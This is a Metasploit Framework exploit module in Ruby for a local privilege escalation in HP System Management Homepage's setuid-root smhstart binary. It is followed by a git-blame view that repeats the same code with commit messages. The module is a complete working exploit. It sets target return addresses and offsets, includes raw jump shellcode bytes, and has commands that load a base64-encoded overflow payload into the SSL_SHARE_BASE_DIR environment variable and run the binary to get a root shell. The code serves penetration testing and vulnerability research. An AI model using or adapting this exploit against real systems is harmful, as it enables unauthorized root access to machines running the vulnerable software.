metasploit-framework/modules/exploits/linux/local/hp_smhstart.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/exploit/local/linux_kernel'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/local/unix'
require 'msf/core/exploit/exe'

#load 'lib/msf/core/post/file.rb'
#load 'lib/msf/core/exploit/local/unix.rb'
#load 'lib/msf/core/exploit/local/linux.rb'
#load 'lib/msf/core/exploit/local/linux_kernel.rb'

class Metasploit4 < Msf::Exploit::Local

	include Msf::Exploit::EXE
	include Msf::Post::File
	include Msf::Post::Common

	include Msf::Exploit::Local::Linux

	def initialize(info={})
		super( update_info( info, {
				'Name'          => 'HP System Management Homepage Local Privilege Escalation',
				'Description'   => %q{
					Versions of hpsmh <= 7.1.1 setuid root smhstart is vulnerable to local buffer overflow in SSL_SHARE_BASE_DIR env variable.
				},
				'License'       => MSF_LICENSE,
				'Author'        =>
					[
						'agix'           #@agixid
					],
				'Platform'      => [ 'linux' ],
				'Arch'          => [ ARCH_X86 ],
				'SessionTypes'  => [ 'shell' ],
				'Payload'		=>
					{
						'Space'     => 227,
						'BadChars' 	=> "\x00\x22"
					},
				'References'    =>
					[
						['OSVDB', '91812'] #not exactly but there is none...
					],
				'Targets'       =>
					[
						[ 'Hpsmh 7.1.1',
							{
								'Arch' => ARCH_X86,
								'CallEsp' => 0x080c86eb,	#call esp
								'Offset' => 58
							}
						],
						[ 'Hpsmh 7.1.2',
							{
								'Arch' => ARCH_X86,
								'CallEsp' => 0x080c8b9b,	#call esp
								'Offset' => 58
							}
						],
					],
				'DefaultOptions' =>
					{
						'PrependSetuid'    => true
					},
				'DefaultTarget' => 0,
				'DisclosureDate' => "Mar 30 2013",
			}
			))
		register_options([
				OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])
			], self.class)
	end

	def exploit
		pl = payload.encoded
		padding = rand_text_alpha(target['Offset'])
		ret = [target['CallEsp']].pack('V')
		exploit = Rex::Text.encode_base64("#{pl}#{ret}\x81\xc4\x11\xff\xff\xff\xe9\x0e\xff\xff\xff#{padding}")
		cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' | base64 -d)")
		cmd_exec("#{datastore['smhstartDir']}/smhstart")
	end

end
hpsmh smhstart local exploit BOF 2013-03-31 11:04:34 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'msf/core/post/common'`
			`require 'msf/core/post/file'`
			`require 'msf/core/post/linux/priv'`
			`require 'msf/core/exploit/local/linux_kernel'`
			`require 'msf/core/exploit/local/linux'`
			`require 'msf/core/exploit/local/unix'`
			`require 'msf/core/exploit/exe'`

			`#load 'lib/msf/core/post/file.rb'`
			`#load 'lib/msf/core/exploit/local/unix.rb'`
			`#load 'lib/msf/core/exploit/local/linux.rb'`
			`#load 'lib/msf/core/exploit/local/linux_kernel.rb'`

			`class Metasploit4 < Msf::Exploit::Local`

			`include Msf::Exploit::EXE`
			`include Msf::Post::File`
			`include Msf::Post::Common`

			`include Msf::Exploit::Local::Linux`

			`def initialize(info={})`
			`super( update_info( info, {`
			`'Name' => 'HP System Management Homepage Local Privilege Escalation',`
			`'Description' => %q{`
			`Versions of hpsmh <= 7.1.1 setuid root smhstart is vulnerable to local buffer overflow in SSL_SHARE_BASE_DIR env variable.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'agix' #@agixid`
			`],`
			`'Platform' => [ 'linux' ],`
			`'Arch' => [ ARCH_X86 ],`
decrement esp to fix crash in the middle of shellcode 2013-04-02 11:25:31 +00:00			`'SessionTypes' => [ 'shell' ],`
hpsmh smhstart local exploit BOF 2013-03-31 11:04:34 +00:00			`'Payload' =>`
			`{`
			`'Space' => 227,`
			`'BadChars' => "\x00\x22"`
			`},`
			`'References' =>`
			`[`
			`['OSVDB', '91812'] #not exactly but there is none...`
			`],`
			`'Targets' =>`
			`[`
			`[ 'Hpsmh 7.1.1',`
			`{`
			`'Arch' => ARCH_X86,`
			`'CallEsp' => 0x080c86eb, #call esp`
decrement esp to fix crash in the middle of shellcode 2013-04-02 11:25:31 +00:00			`'Offset' => 58`
hpsmh smhstart local exploit BOF 2013-03-31 11:04:34 +00:00			`}`
			`],`
			`[ 'Hpsmh 7.1.2',`
			`{`
			`'Arch' => ARCH_X86,`
			`'CallEsp' => 0x080c8b9b, #call esp`
decrement esp to fix crash in the middle of shellcode 2013-04-02 11:25:31 +00:00			`'Offset' => 58`
hpsmh smhstart local exploit BOF 2013-03-31 11:04:34 +00:00			`}`
			`],`
			`],`
decrement esp to fix crash in the middle of shellcode 2013-04-02 11:25:31 +00:00			`'DefaultOptions' =>`
			`{`
			`'PrependSetuid' => true`
			`},`
hpsmh smhstart local exploit BOF 2013-03-31 11:04:34 +00:00			`'DefaultTarget' => 0,`
			`'DisclosureDate' => "Mar 30 2013",`
			`}`
			`))`
			`register_options([`
			`OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])`
			`], self.class)`
			`end`

			`def exploit`
			`pl = payload.encoded`
			`padding = rand_text_alpha(target['Offset'])`
			`ret = [target['CallEsp']].pack('V')`
decrement esp to fix crash in the middle of shellcode 2013-04-02 11:25:31 +00:00			`exploit = Rex::Text.encode_base64("#{pl}#{ret}\x81\xc4\x11\xff\xff\xff\xe9\x0e\xff\xff\xff#{padding}")`
hpsmh smhstart local exploit BOF 2013-03-31 11:04:34 +00:00			`cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit}' \| base64 -d)")`
decrement esp to fix crash in the middle of shellcode 2013-04-02 11:25:31 +00:00			`cmd_exec("#{datastore['smhstartDir']}/smhstart")`
hpsmh smhstart local exploit BOF 2013-03-31 11:04:34 +00:00			`end`

			`end`